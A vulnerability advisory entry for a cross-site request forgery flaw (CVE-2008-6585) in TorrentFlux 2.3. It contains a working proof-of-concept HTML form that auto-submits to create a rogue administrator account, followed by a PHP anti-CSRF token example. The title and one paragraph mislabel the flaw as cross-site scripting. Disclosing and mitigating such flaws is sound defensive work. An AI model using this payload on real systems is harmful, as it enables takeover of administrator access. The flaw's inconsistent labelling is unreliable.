TorrentFlux Cross-Site Scripting Vulnerability

Vulnerability ID: 1115024    Vulnerability type: Cross-site request forgery
Published: 2008-04-18    Updated: 2009-04-06
CVE ID: CVE-2008-6585    CNNVD-ID: CNNVD-200904-053
Platform: PHP    CVSS score: 6.8
|Vulnerability source
https://www.exploit-db.com/exploits/31671
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200904-053
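|Vulnerability details
TorrentFlux is a PHP-based BitTorrent download client that manages all torrent downloads through a convenient web interface. When it is installed on a web server, BitTorrent downloads can be managed through that web interface. The TorrentFlux script html/index.php has a cross-site scripting vulnerability: a remote attacker can hijack the administrator's add-user request through the addUser operation.
|Vulnerability EXP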
source: http://www.securityfocus.com/bid/28846/info

TorrentFlux is prone to a cross-site request-forgery vulnerability and a remote PHP code-execution vulnerability.

Exploiting these issues may allow a remote attacker to create administrative accounts in the application or to execute arbitrary PHP script code. This may facilitate the remote compromise of affected computers.

TorrentFlux 2.3 is vulnerable; other versions may also be affected.

<html>
Add an administrative account:
<form id="create_admin" method="post" action="http://localhost/torrentflux_2.3/html/admin.php?op=addUser">
<input type=hidden name="newUser" value="sadmin">
<input type=hidden name="pass1" value="password">
<input type=hidden name="pass2" value="password">
<input type=hidden name="userType" value=1>
<input type=submit value="create admin">
</form>
</html>
<script>
document.getElementById("create_admin").submit();
</script>
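
The form above works because the addUser operation accepts any POST that arrives with the administrator's session cookie. One way to reject such requests is a per-session anti-CSRF token checked before state-changing admin operations; this is an added example, not TorrentFlux code, it assumes PHP 7 or later, and the `csrf_token` field, the helper functions and the `$stateChangingOps` list are hypothetical names.

```php
<?php
// Added example, not TorrentFlux code. The csrf_token field, the helper
// functions and the $stateChangingOps list are hypothetical names.
declare(strict_types=1);

session_start();

/** Return the per-session token, creating it on first use. */
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

/** Hidden field to embed in every admin form, e.g. the add-user form. */
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

/** True only for a POST that carries the token bound to this session. */
function csrf_request_is_valid(): bool
{
    if (($_SERVER['REQUEST_METHOD'] ?? '') !== 'POST') {
        return false;
    }
    $sent = $_POST['csrf_token'] ?? '';
    $expected = $_SESSION['csrf_token'] ?? '';
    return is_string($sent) && $expected !== ''
        && hash_equals($expected, $sent);   // constant-time comparison
}

// Gate placed at the top of the admin dispatcher, before any op runs.
$stateChangingOps = ['addUser'];             // extend with other write ops
$op = $_GET['op'] ?? '';
if (in_array($op, $stateChangingOps, true) && !csrf_request_is_valid()) {
    http_response_code(403);
    error_log('CSRF check failed for op=' . $op . ' from '
        . ($_SERVER['REMOTE_ADDR'] ?? 'unknown'));
    exit('Request rejected: missing or invalid CSRF token.');
}
```

A page on another origin cannot read the session's token, so its auto-submitted POST is answered with 403 and logged. Setting the SameSite attribute on the session cookie is a complementary control.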
|References

Source: XF
Name: torrentflux-admin-csrf(41926)
Link: http://xforce.iss.net/xforce/xfdb/41926
Source: BID
Name: 28846
Link: http://www.securityfocus.com/bid/28846
Source: BUGTRAQ
Name: 20080418 BitTorrent Clients and CSRF
Link: http://www.securityfocus.com/archive/1/archive/1/491066/100/0/threaded
Source: SECUNIA
Name: 29935
Link: http://secunia.com/advisories/29935
Source: OSVDB
Name: 44646
Link: http://osvdb.org/44646